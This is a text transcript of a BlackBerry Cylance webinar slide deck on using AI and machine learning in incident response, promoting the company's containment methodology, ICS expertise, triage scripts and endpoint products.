THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this...
Transcript of THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this...
![Page 1: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/1.jpg)
T O M PA C E
V P, G L O B A L E N T E R P R I S E S O L U T I O N S
THE ROLE OF AI IN INCIDENT RESPONSE
The webinar will start momentarily. Please stand by.
![Page 2: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/2.jpg)
S AF E H AR B O R
The information in this presentation is confidential and proprietary to BlackBerry ® Cylance® and may not be disclosed without
the permission of BlackBerry Cylance. This presentation is not subject to your license agreement or any other service or
subscription agreement with BlackBerry Cylance. BlackBerry Cylance has no obligation to pursue any course of business
outlined in this document or any related presentation, or to develop or release any functionality mentioned therein.
This document, or any related presentation and BlackBerry Cylance's strategy and possible future development, product,
and/or platform direction and functionality are all subject to change and may be changed by BlackBerry Cylance at any time for
any reason without notice. The information on this document is not a commitment, promise, or legal obligation to deliver any
material, code, or functionality. This document is for informational purposes and may not be incorporated into a contract.
BlackBerry Cylance assumes no responsibility for errors or omissions in this document.
![Page 3: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/3.jpg)
AG E N D A
Current State of Incident Response (IR) Services
Impacts of AI in the BlackBerry Cylance IR Methodology
Forrester Wave Report Analysis of
BlackBerry Cylance IR Services
Q&A
![Page 4: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/4.jpg)
W H O I S T O M ?
▪ 14 Years of Security Experience
▪ Multiple Verticals (Government, Law Enforcement, Financial)
▪ 4 Years in the Marine Corps
▪ Infantry / Intelligence Work
▪ Afghanistan ’06 / Iraq ’07
▪ Education:
▪ MS, University of Pittsburgh
▪ Certifications:
▪ SANS: GCFA, GCIH, GCIA, GCWN, GCISP
▪ CISSP, SFCP
▪ Adjunct Professor at Tulane University
▪ RSA & Black Hat Speaker/Trainer
![Page 5: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/5.jpg)
CURRENT STATE OF IR SERVICES
![Page 6: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/6.jpg)
▪ How many repeated ransomware incidents
have you had?
▪ How many multiple variants of same
malware have you had to deal with
over the years?
▪ How many incidents have you done
forensics and found out data was exfiltrated
months before you detected it?
1 Source: Ponemon Institute | 2018 Cost of a Data Breach Study
C U R R E N T S TAT E O F I N C I D E N T R E S P O N S E S E R V I C E S
THE AVERAGE
HACK TAKES
197 DAYS
TO BE DETECTED1
![Page 7: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/7.jpg)
CYLANCE: STRONG PERFORMER IN IR
![Page 8: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/8.jpg)
▪ Cylance has well-defined processes and tooling to
ensure effective incident response. Cylance is a global
company who will only have greater reach with their recent
acquisition by BlackBerry.
▪ They have a wide range of products and services, and
established partnerships with law firms as well as
insurance brokers as well as carriers.
▪ Cylance has demonstrated incident response expertise
including investigating industrial control system (ICS)
environments.
The Forrester Wave™ is copyrighted by Forrester Research, Inc. Forrester and Forrester Wave are trademarks of Forrester Research, Inc. The Forrester Wave is a graphical representation of Forrester's
call on a market and is plotted using a detailed spreadsheet with exposed scores, weightings, and comments. Forrester does not endorse any vendor, product, or service depicted in the Forrester Wave.
Information is based on best available resources. Opinions reflect judgment at the time and are subject to change.
T H E F O R R E S T E R WAV E :
C Y B E R S E C U R I T Y I N C I D E N T
R E S P O N S E S E R V I C E S , Q 1 2 0 1 9
![Page 9: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/9.jpg)
B L AC K B E R RY C Y L AN C E D I F F E R E N T I AT O R S
ICS Expertise.
Some of the leaders are
outsourcing this capability with
other vendors like Dragos. We
have our own internal ICS team
which allows us to provide a
much more streamlined
approach.
Containment,
Remediation and
Prevention based
approach.
Almost all of the vendors in this
Wave have inferior containment
technology; our ability to rapidly
quarantine known and unknown
malware as well as leverage
detection rules and REFRACT
packages and playbooks
provides a massive
differentiator.
Product expertise.
Being intimately familiar with the
tools you are using from an IR
perspective is critical, and thus
a differentiator.
![Page 10: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/10.jpg)
ICS EXPERTISE
![Page 11: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/11.jpg)
Artificial intelligence/machine learning approach –
revolutionary for this industry
Three pronged approach:
▪ Discover the business impact of a cyber threat on
the ICS
▪ Identify vulnerabilities and indicators of
compromise within the control system
environment
▪ Identify and prioritize mitigation strategies
E M P L O Y E E E X P E R T I S E :
I N D U S T R I AL C O N T R O L S Y S T E M S
![Page 12: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/12.jpg)
ICS Security Fundamentals
ICS Red Team Services
ICS Compromise Assessment
ICS Incident Containment (Response)
ICS Component Testing & Analysis
ICS Security Assessment
Building Automation Assessment
ICS Policy Gap Analysis
ICS Security Monitoring
ICS Backup and Recovery
ICS Incident Response Program
Review
I C S S E R V I C E S
![Page 13: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/13.jpg)
▪ Keynote speaker at SANS Oil and Gas Summit
▪ ICS Security Program and Standards (including NIST CSF, C2M2, IEC 62443, etc.)
▪ ICS Network and Security Architecture Design and Implementation
▪ ICS Standards Development and Deployment
▪ Process Development and Integration
▪ Designing and Implementing IT and Security Technology into ICS
▪ Multiple ICS Vendor Technologies and Platforms (Embedded Hardware and Application Software)
▪ Multiple ICS Specific Protocols
▪ Operations experience across many ICS industries
▪ Primary course creator for SANS 515 Incident Response in ICS environments
E M P L O Y E E E X P E R T I S E :
I N D U S T R I AL C O N T R O L S Y S T E M S
![Page 14: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/14.jpg)
What specific
tooling is required
to operate in an ICS
environment?
E M P L O Y E E E X P E R T I S E :
I N D U S T R I AL C O N T R O L S Y S T E M S
▪ All the benefits of CA process and P1 scripts
▪ Lightweight agent (CylancePROTECT®)
▪ We analyze network traffic (IT and ICS protocols) using
commercial, open source and custom tools
▪ Specific hardware around specific PLC devices, and
other ICS hardware
▪ Leverage client or vendor supplied tools as appropriate
![Page 15: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/15.jpg)
INCIDENT RESPONSE METHODOLOGY
![Page 16: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/16.jpg)
M O N I T O R
Proactive services to identify
potential infection vectors
Alerts on new vulnerabilities
The solution to solving an organization’s security problem includes….
I D E N T I F Y
Compromise Assessment
Assess compromise activity
P R E V E N T
Containment and
Remediation
Predict and prevent
future attacks
R E M E D I A T E
Incident Containment
Remediate compromises
I N C I D E N T R E S P O N S E PAT H WAY T O P R E V E N T I O N
![Page 17: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/17.jpg)
I N C I D E N T C O N TAI N M E N T P R O C E S S
Deploy Tools Collect Data Analyze Data Report
Known IOC
AI/ML
File Meta data Findings
Recommendation
CylancePROTECT,
Collection Scripts,
CylanceOPTICS™
![Page 18: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/18.jpg)
AI & T H E E V O L U T I O N T O P R E V E N T I O N
LEGACY
▪ One of the tools detects “something”
▪ Reactive
▪ Image the entire disk and/or memory
▪ Time consuming
▪ Large amount of data
▪ Requires hardware/appliances in
environment for additional visibility
▪ Increase in capital costs
▪ “Seize all, find all”
PREVENTION-BASED INCIDENT CONTAINMENT
Oxymoron?
![Page 19: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/19.jpg)
AI & T H E E V O L U T I O N T O P R E V E N T I O N
LEGACY
▪ One of the tools detects “something”
▪ Reactive
▪ Image the entire disk and/or memory
▪ Time consuming
▪ Large amount of data
▪ Requires hardware/appliances in
environment for additional visibility
▪ Increase in capital costs
▪ “Seize all, find all”
PREVENTION-BASED INCIDENT CONTAINMENT
▪ No network taps or monitoring of egress points
▪ Assesses every endpoint
▪ Leverage your software deployment to push out
dissolvable scripts and/or through the agent
▪ Principle of least data
▪ Speed in analysis – we’re TWICE as fast!
▪ Use AI for detection of malware, PUPs and
compromised credentials
▪ Containment with a single mouse click
![Page 20: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/20.jpg)
I R P R O C E S S / F L O W
1. Hunt - Determine the Scope of the (P1)
Incident with Confidence:▪ Cylance Compromise Assessment
▪ Acquire critical artifacts
▪ Leverage AI to find compromise(s)
2. Investigate the Trail, INSPECT (P2)▪ Further utilize AI to work smarter
▪ Collect additional artifacts
▪ Enrich the data
▪ Pivot across all data points
Suspect Systems
CylanceINSPECTCylanceV
CylanceINVESTIGATE
Actionable Results Manual Analysis
Scope Identified
Compromise Assessment
Remediation/Prevention
![Page 21: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/21.jpg)
• Has data been stolen or destroyed?
• Were systems, services, or applications sabotaged?
• Were administrative or security controls subverted?
• How are threat actors exerting external command of the environment?
• Did adversarial lateral movement between systems or networks occur?
• How prevalent are user accounts throughout the environment?
• Were any users’ accounts compromised?
• Were user accounts leveraged in lateral movement?
• What indicators of compromise or persistence are present within the
environment? How were they delivered?
• Are there occurrences of known indicators of compromise?
• What was the intended usage of malware and persistence mechanisms?
• What applications, configurations, or operating systems contain
potential security risks?
AR E A S O F AN A LY S I S
![Page 22: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/22.jpg)
C Y T R I AG E – P H AS E 1 H U N T I N G S C R I P T S
▪ Leverages artificial intelligence
▪ Determines anomalies, correlations and root causes
▪ Provides the fastest results in the industry
▪ Lightweight, quiet scripts without tipping off attacker
▪ Once environment is remediated, we’ll move it to a
state of PREVENTION
▪ Assists in determining depth and breadth of the
incidentLEVERAGED IN IR AND CA
ENGAGEMENTS
![Page 23: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/23.jpg)
C Y T R I AG E – P H AS E 1 H U N T I N G S C R I P T S
We can assess every endpoint
▪ Servers
▪ Workstations
![Page 24: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/24.jpg)
C Y T R I AG E – P H AS E 1 H U N T I N G S C R I P T S
Use system
commands to
gather data
2 – 5
minutes
whoami
date /T
dir /R /a /s /tc
ipconfig
/displaydns
netstat /ano
tasklist
tlist
schtasks /query /v /fo csv
route print
nltest
reg
xcopy Metadata is sent
to Cylance for
Compromise AI
Analysis
![Page 25: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/25.jpg)
I N S P E C T – P H AS E 2 E X E C U TAB L E
Deep dive into
suspect systems
~30
minutes
$MFT
Evtx
Memory
Prefetch
Processes
CylanceV
Network
Schtasks and Job files
Internet
History
$LogFile
Hashes
Registry Physical artifacts for
additional analysis
![Page 26: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/26.jpg)
I R P R O C E S S / F L O W
1. Hunt - Determine the Scope of the (P1)
Incident with Confidence:▪ Cylance Compromise Assessment
▪ Acquire critical artifacts
▪ Leverage AI to find compromise(s)
2. Investigate the Trail, INSPECT (P2)▪ Further utilize AI to work smarter
▪ Collect additional artifacts
▪ Enrich the data
▪ Pivot across all data points
Suspect Systems
CylanceINSPECTCylanceV
CylanceINVESTIGATE
Actionable Results Manual Analysis
Scope Identified
Compromise Assessment
Remediation/Prevention
![Page 27: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/27.jpg)
I R P R O C E S S / F L O W
▪ The remediation/Prevention Phase is solved by
CylancePROTECT
▪ CONTAINMENT of the threats
▪ Detection and response
▪ Identification of malicious/anomalous behavior
▪ Automated playbook and response capabilities
![Page 28: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/28.jpg)
14
18
6
18
17
20
18
21
0 5 10 15 20 25
Goldeneye
Sauron/Strider/Remsec
Zcryptor
GlassRat
Shamoon 2
WannaCry
QakBot 17
NotPetyaPetya /
CylancePROTECT has been able to detect and block new threats before they were first seen “in the wild” –
without any updates or special configuration.
I N C I D E N T C O N TAI N M E N T O F U N K N O W N T H R E AT S
![Page 29: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/29.jpg)
I N C I D E N T R E S P O N S E D E P L O Y M E N T O P T I O N S
Environment, incident type, severity and time dictate which use case should be applied
to each particular situation.
Options (Subset):
▪ Scripts
▪ Scripts + CylancePROTECT
▪ Scripts + CylancePROTECT + CylanceOPTICS
Use cases
▪ Malware containment
▪ Root cause analysis
▪ Patient 0 identification
![Page 30: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/30.jpg)
Using BlackBerry Cylance products which
occurs in almost all IR engagements provides
these incredibly fast MTTD, MTTR and
MTTC.
The combined approach that BlackBerry
Cylance takes is also a differentiator.
BlackBerry Cylance employs teams of ICS
consultants, pentesters and IoT/Embedded
experts – all of whose expertise is brought to
bear as needed during an IR engagement.
P O S T I N C I D E N T R E P O R T I N G AN D S U P P O R T
![Page 31: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/31.jpg)
▪ Integrated Practice Areas
▪ Dedicated Engagement Manager
▪ Holistic Approach
▪ Customized Solutions
▪ World-Renowned Security Authorities
▪ Global Coverage with Local Attention
ThreatZERO™ ICSEDUCATION
IoT /
EMBEDDEDRED TEAM
SERVICES
INCIDENT
CONTAINMENT
& FORENSICS
P O S T I N C I D E N T R E P O R T I N G AN D S U P P O R T
![Page 32: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/32.jpg)
PRODUCT EXPERTISE LEVERAGING THE CYLANCE AI PLATFORM™
![Page 33: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/33.jpg)
S U P P O R T I N G P R O D U C T S AN D S E R V I C E S
CylancePROTECT
Enterprise Prevention
CylanceOPTICS
Consistent Visibility and
Preventative EDR
CylanceV™
Malware Detection
CyTriage
Phase 1 Scripts
Cylance INSPECT
Phase 2 standalone
executable
Cylance COLLECT
On-demand full disk
imaging capabilities
CyNTH
Cylance Novel Threat Hunting
ELK Analysis Platform
▪ Custom Data Science Models
integrated into the platform
▪ Phase 1 and 2 data ingested
into the platform for scalable
analysis and timelining
![Page 34: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/34.jpg)
Antivirus replacement
Utilizes Machine Learning
Most admin features and reporting
Protects against executable, memory,
script, and USB attacks
![Page 35: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/35.jpg)
W H Y C Y L AN C E P R O T E C T
▪ 96.8% success rate vs.
malware (NSS Labs)
▪ 0.001% False Positive Rate
▪ Malware
▪ Fileless Malware
▪ Advanced Persistent Threats
▪ Zero-Days
EFFECTIVENESS
▪ Replaces Traditional AV
▪ Increases ROI Up To 250%*
vs. Traditional AV
▪ Remove Additional Layers
▪ Reduce Help Desk Calls by
98%*
▪ Stop Emergency Patching
*Source: Forrester Consulting Total Economic Impact Report
SIMPLICITY
▪ Lightweight Agent
▪ User Systems Run Faster
▪ Extends Hardware Lifespan
▪ Network Bandwidth Reduction
PERFORMANCE
![Page 36: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/36.jpg)
Threat visibility
Hunt and kill workflow
Detection and response
Integrated with CylancePROTECT
Retrieve Forensic Artifact Capabilities
![Page 37: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/37.jpg)
C Y L AN C E O P T I C S M AC H I N E L E AR N I N G
▪ One-liner ML Module
▪ Scripting engines are the workhorses of IT operations, but they expose a significant amount of
functionality that can be leveraged by malicious actions. This module evaluates the content of
command line scripts with an emphasis on the language of the script and the command line
context of the script
▪ Malicious Application Behavior ML Module
▪ An overwhelming number of attacks target a small, predictable number of trusted applications
commonly found in enterprise environments. This model learns legitimate actions between
common software and the operating system and blocks anything that veers to far of course.
![Page 38: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/38.jpg)
C Y L AN C E V B E N E F I T S
▪ On-demand scanning
▪ Automated scanning
▪ Scan drives or directories for new/changed files
▪ Option to move/delete threats when detected
▪ Threat notifications can be sent to syslog
▪ Ensure you have the latest version of CylanceV –
2.7.0.3 is the current version
![Page 39: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/39.jpg)
Bad/Good executable scanner
Utilizes Machine Learning
Used for threat hunting on machines without Protect
Has extra models such as OLE and PDF
![Page 40: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/40.jpg)
S U P P O R T I N G P R O D U C T S AN D S E R V I C E S
ELK Analysis Platform
![Page 41: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/41.jpg)
S T R AT E G I C P R O D U C T R O AD M A P F O R I R
BlackBerry
▪ Mobile security and response offerings
▪ Penetration of net new client base, specifically
government, IoT and Automotive
▪ Integration of BlackBerry technology into IR tool stack
Integration of
CylancePERSONA™
technology into the IR process
Additional EDR machine learning
models built from input from IR
engagements and fed into the
CylanceOPTICS PM team
Fully integrated threat research
capabilities
![Page 42: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/42.jpg)
I N N O VAT I O N :
T H R E AT R E S E AR C H I N T E G R AT I O N
▪ Sharing of CIMS (BlackBerry Cylance Incident Management
Sheet) reports between IR and TR teams
▪ Assists in deriving intelligence based on threats identified in
client environments
▪ Leverages telemetry from all client environments to determine
risk and prevalence of particular threats
▪ Assists in malware analysis, reverse engineering and research.
USES AI FOR CLASSIFICATION
▪ Ability to quickly derive IOCs and share back with the IR team
Is this malware unique?
How many machines is it on?
![Page 43: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/43.jpg)
I N N O VAT I O N :
D ATA S C I E N C E I N T E G R AT I O N
Data science team requires well labeled malicious
data, IOCs, etc. as well as benign data from various
types of environments, verticals and company sizes.
This data can be derived from:
▪ IR engagements
▪ CAs
▪ Pentests
▪ Vulnerability assessments
Data flows from the IR
team to the data
science team
Models and other analytical
techniques flow back to the
IR team
![Page 44: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/44.jpg)
I N N O VAT I O N :
D ATA S C I E N C E I N T E G R AT I O N
Models
▪ User Clustering leveraging the K-Means algorithm
▪ DGA Detection using Neural Networks
▪ Process Anomaly Detection using Random Forests
▪ Malware Nearest Neighbor Identification leveraging HDBSCAN
![Page 45: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/45.jpg)
P R E S S R E L E AS E
“We’re so pleased to see Forrester reinforce, in our opinion, the effectiveness of our proven AI
incident response methodology based on containment, remediation, and prevention. Our expert
consultants work quickly to not only resolve incidents and restore operations, but also to leverage
BlackBerry Cylance’s first-of-its-kind artificial intelligence to get ahead of the kill chain and prevent
incidents before they happen.”Corey White
Chief Customer Officer, BlackBerry Cylance
Sasi Murthy
VP of Product Marketing, BlackBerry Cylance
“We believe Cylance Consulting is one of the few vendors listed in the Forrester Wave that
licenses and shares its machine learning based tools and methodologies. Our continued
commitment to sharing these tools and techniques, as well as collaborating with our strategic
consulting partners is helping to create a stronger and more effective incident response
community around the world.”
![Page 46: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/46.jpg)
QUESTIONS
A N D
ANSWERS
![Page 47: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/47.jpg)
Contact Us
+1-877-973-3336
Learn more about Cylance Consulting
![Page 48: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/48.jpg)
Additional Resources
Incident Containment and Forensics –
Incident Containment
Incident Containment Retainer
Compromise Assessment
![Page 49: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/49.jpg)
T H AN K Y O U
![Page 50: THE ROLE OF AI IN INCIDENT RESPONSE - blackberry.com€¦ · SAFE HARBOR The information in this presentation is confidential and proprietary to BlackBerry ®Cylance and may not be](https://reader036.fdocuments.us/reader036/viewer/2022071007/5fc41e6e3442c50d93639466/html5/thumbnails/50.jpg)